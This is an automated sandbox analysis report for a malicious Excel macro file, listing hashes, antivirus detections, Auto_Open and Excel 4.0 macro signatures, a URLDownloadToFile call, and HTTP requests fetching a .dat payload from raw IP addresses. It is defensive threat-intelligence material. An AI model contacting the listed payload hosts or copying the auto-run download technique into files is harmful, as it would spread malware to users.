Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 9177284661-04302021.xlsm

Overview

General Information

Sample Name:9177284661-04302021.xlsm
Analysis ID:403443
MD5:a8b4e37766d35b543884d8882147eaa2
SHA1:4356c14118ea9098dabb6d9af620003b7929058a
SHA256:533c8713c4e10c223a9f8139f9d408ca326aee14a1d88382c91f2ff18cf0f93c
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Yara detected MalDoc1
Allocates a big amount of memory (probably used for heap spraying)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6340 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
sheet3.xmlJoeSecurity_MalDoc_1Yara detected MalDoc_1Joe Security
    sharedStrings.xmlJoeSecurity_MalDoc_1Yara detected MalDoc_1Joe Security

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for domain / URLShow sources
      Source: http://45.144.31.232/44313,6048108796.datVirustotal: Detection: 8%Perma Link
      Multi AV Scanner detection for submitted fileShow sources
      Source: 9177284661-04302021.xlsmVirustotal: Detection: 38%Perma Link
      Source: 9177284661-04302021.xlsmReversingLabs: Detection: 31%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

      Software Vulnerabilities:

      barindex
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
      Source: excel.exeMemory has grown: Private usage: 1MB later: 80MB
      Source: global trafficTCP traffic: 192.168.2.6:49720 -> 185.45.193.80:80
      Source: global trafficTCP traffic: 192.168.2.6:49720 -> 185.45.193.80:80

      Networking:

      barindex
      Yara detected MalDoc1Show sources
      Source: Yara matchFile source: sheet3.xml, type: SAMPLE
      Source: Yara matchFile source: sharedStrings.xml, type: SAMPLE
      Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.45.193.80Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.144.31.232Connection: Keep-Alive
      Source: unknownTCP traffic detected without corresponding DNS query: 185.45.193.80
      Source: unknownTCP traffic detected without corresponding DNS query: 185.45.193.80
      Source: unknownTCP traffic detected without corresponding DNS query: 185.45.193.80
      Source: unknownTCP traffic detected without corresponding DNS query: 185.45.193.80
      Source: unknownTCP traffic detected without corresponding DNS query: 82.118.21.70
      Source: unknownTCP traffic detected without corresponding DNS query: 82.118.21.70
      Source: unknownTCP traffic detected without corresponding DNS query: 82.118.21.70
      Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.232
      Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.232
      Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.232
      Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.232
      Source: unknownTCP traffic detected without corresponding DNS query: 185.45.193.80
      Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.232
      Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.232
      Source: unknownTCP traffic detected without corresponding DNS query: 185.45.193.80
      Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.45.193.80Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.144.31.232Connection: Keep-Alive
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://api.aadrm.com/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://api.cortana.ai
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://api.diagnostics.office.com
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://api.office.net
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://api.onedrive.com
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://augloop.office.com
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://augloop.office.com/v2
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://cdn.entity.
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://clients.config.office.net/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://config.edge.skype.com
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://cortana.ai
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://cortana.ai/api
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://cr.office.com
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://dev.cortana.ai
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://devnull.onenote.com
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://directory.services.
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://graph.windows.net
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://graph.windows.net/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://lifecycle.office.com
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://login.windows.local
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://management.azure.com
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://management.azure.com/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://messaging.office.com/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://ncus.contentsync.
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://ncus.pagecontentsync.
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://officeapps.live.com
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://onedrive.live.com
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://outlook.office.com/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://outlook.office365.com/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://settings.outlook.com
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://staging.cortana.ai
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://store.office.com/addinstemplate
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://tasks.office.com
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://templatelogging.office.com/client/log
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://wus2.contentsync.
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://wus2.pagecontentsync.
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drString found in binary or memory: https://www.odwebp.svc.ms

      System Summary:

      barindex
      Found malicious Excel 4.0 MacroShow sources
      Source: 9177284661-04302021.xlsmInitial sample: urlmon
      Document contains an embedded VBA macro which may execute processesShow sources
      Source: VBA code instrumentationOLE, VBA macro: Module Byutut, Function Auto_Open, API Microsoft Excel:Application.Run(:Range)Name: Auto_Open
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: 9177284661-04302021.xlsmInitial sample: EXEC
      Source: 9177284661-04302021.xlsmOLE, VBA macro line: Public Function Auto_Open()
      Source: VBA code instrumentationOLE, VBA macro: Module Byutut, Function Auto_OpenName: Auto_Open
      Source: 9177284661-04302021.xlsmOLE indicator, VBA macros: true
      Source: classification engineClassification label: mal80.troj.expl.evad.winXLSM@1/8@0/3
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{F612D367-30B3-4645-A2BE-D0BDDD421362} - OProcSessId.datJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: 9177284661-04302021.xlsmVirustotal: Detection: 38%
      Source: 9177284661-04302021.xlsmReversingLabs: Detection: 31%
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: 9177284661-04302021.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
      Source: 9177284661-04302021.xlsmInitial sample: OLE zip file path = xl/drawings/drawing2.xml
      Source: 9177284661-04302021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
      Source: 9177284661-04302021.xlsmInitial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
      Source: 9177284661-04302021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
